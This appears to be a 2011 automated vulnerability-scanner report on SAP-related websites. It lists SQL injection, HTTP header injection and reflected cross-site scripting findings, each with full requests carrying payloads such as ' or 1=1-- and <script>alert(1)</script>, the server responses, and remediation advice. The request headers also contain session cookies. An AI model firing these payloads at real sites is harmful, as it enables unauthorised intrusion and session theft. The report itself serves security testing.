                                                               <td colspan="1" class="field-label" width="10">&nbsp;</td>
                                                           
                                                                       <td colspan="4" class="field-label" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                               <script type="text/javascript">
function displayQuestion(id1) {
   var browserName=navigator.appName;
   if (browserName=="Netscape") {
       document.getElementById(id1).style.display = 'table-row-group';
   } else {
       document.getElementById(id1).style.display = 'inline';
   }
}
function hideQuestion(id1) {
   document.getElementById(id1).style.display = 'none';
}

function displayHide(id1,id2) {
   if (document.RegForm.sTandC.checked)
       displayQuestion(id1)
   else
       hideQuestion(id1)
}
</script>

<p><strong>SAP TechEd Registrant Terms and Conditions</strong></p><p>This registration and your attendance at SAP TechEd is subject to the &quot;<a href="javascript:newwindow(&#39;index.cfm?fuseaction=reg.TermsAndConditions&amp;bHeader
...[SNIP]...
1.2. http://weblogs.sdn.sap.com/pub/t/27 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/27

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16635132'%20or%201%3d1--%20 and 16635132'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pub/t/2716635132'%20or%201%3d1--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:44:02 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 83451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: SAP NetWeaver Platform</title>
   <link href="weblogs" rel="schema.DC" />
   <link rel="image_src" href="/images/sap_fb_icon_73_73.gif" />
   <meta name="description" content="" />
   <meta name="DC.description" content="" />
   <meta name="author" content="" />
   <meta name="DC.author" content="" />
   <meta name="date" content="May. 23, 2003" />
   <meta name="DC.date" content="May. 23, 2003" />
   <meta name="keywords" content="SDN Blogs,,sap blog,business blog,software blogs,application blog" />
   <meta name="DC.keywords" content="SDN Blogs,,sap blog,business blog,software blogs,application blog" />

<link rel="STYLESHEET" type="text/css" href="http://weblogs.sdn.sap.com/css/csin.css" />
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.domain.indexOf(".")+1);
</script>



<script type="text/javascript" language="javascript">
try {
   // Match http or https
   var pattern = /^https?:\/\/(www(\d{3})?|wwwn|admin|webservice)\.sdn\.sap\.com/;

   if (!pattern.test(parent.location.href)) {
       // preserve current protocol, whether http or https



parent.location.replace(document.location.protocol+'//www.sdn.sap.com/irj/scn/weblogs?blog='
           + escape(document.location.pathname) + escape(document.location.search));
   }    
} catch (e) { }
</script>
<noscript><!-- script for frames and spidering --></noscript>




</head>

<body style="padding-right: 0px; padding-left: 0px; padding-bottom: 0px; margin: 0px; padding-top: 0px">

<table cellspacing="0" cellpadding="0" border="0" style="padding-top:15px;">
<tr>
<td width="12">&nbsp;&nbsp;&nbsp;</td>
<td width="100%
...[SNIP]...

Request 2

GET /pub/t/2716635132'%20or%201%3d2--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2011 14:44:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 38
Connection: close
Content-Type: text/html

The server has encountered a problem.
2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 57e50%0d%0a7cb60e2cdc6 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /reservoir?d=57e50%0d%0a7cb60e2cdc6&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:46 GMT
Server: Apache
X-Server-Name: resweb@dc1web51
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:46 GMT
Location: http://reservoir.marketstudio.net/57e50
7cb60e2cdc6?d=57e50%0d%0a7cb60e2cdc6&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession
Content-Length: 350
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://reservoir.marketstudio.net/57e50
7cb60e
...[SNIP]...
3. Cross-site scripting (reflected)  previous  next
There are 139 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a68f<script>alert(1)</script>2f938d81d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img6a68f<script>alert(1)</script>2f938d81d11/assets/mobility/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:40 GMT
Date: Sat, 15 Oct 2011 14:25:40 GMT
Connection: close

File not found: /img6a68f<script>alert(1)</script>2f938d81d11/assets/mobility/unwired.jpg
3.2. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f743b<script>alert(1)</script>1d42a6eebdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assetsf743b<script>alert(1)</script>1d42a6eebdc/mobility/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:41 GMT
Date: Sat, 15 Oct 2011 14:25:41 GMT
Connection: close

File not found: /img/assetsf743b<script>alert(1)</script>1d42a6eebdc/mobility/unwired.jpg
3.3. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7944<script>alert(1)</script>23ec30e32fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assets/mobilityd7944<script>alert(1)</script>23ec30e32fa/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86368
Expires: Sun, 16 Oct 2011 14:25:12 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/assets/mobilityd7944<script>alert(1)</script>23ec30e32fa/unwired.jpg
3.4. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2415<script>alert(1)</script>4d9ac83b755 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assets/mobility/unwired.jpga2415<script>alert(1)</script>4d9ac83b755?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/assets/mobility/unwired.jpga2415<script>alert(1)</script>4d9ac83b755
3.5. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 117e1<script>alert(1)</script>973b6f008cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img117e1<script>alert(1)</script>973b6f008cd/banners/Madrid.288.png?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Cache-Control: public, max-age=86350
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Date: Sat, 15 Oct 2011 14:25:45 GMT
Connection: close

File not found: /img117e1<script>alert(1)</script>973b6f008cd/banners/Madrid.288.png
3.6. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c1bb<script>alert(1)</script>a2aabb6bf4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners7c1bb<script>alert(1)</script>a2aabb6bf4e/Madrid.288.png?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
